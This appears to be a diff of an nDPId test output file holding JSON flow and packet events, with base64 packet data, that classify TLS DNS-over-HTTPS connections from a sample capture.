+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEz
QyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjp
stykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} 
-00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} 
-00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7580000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7580000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIj
UNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRT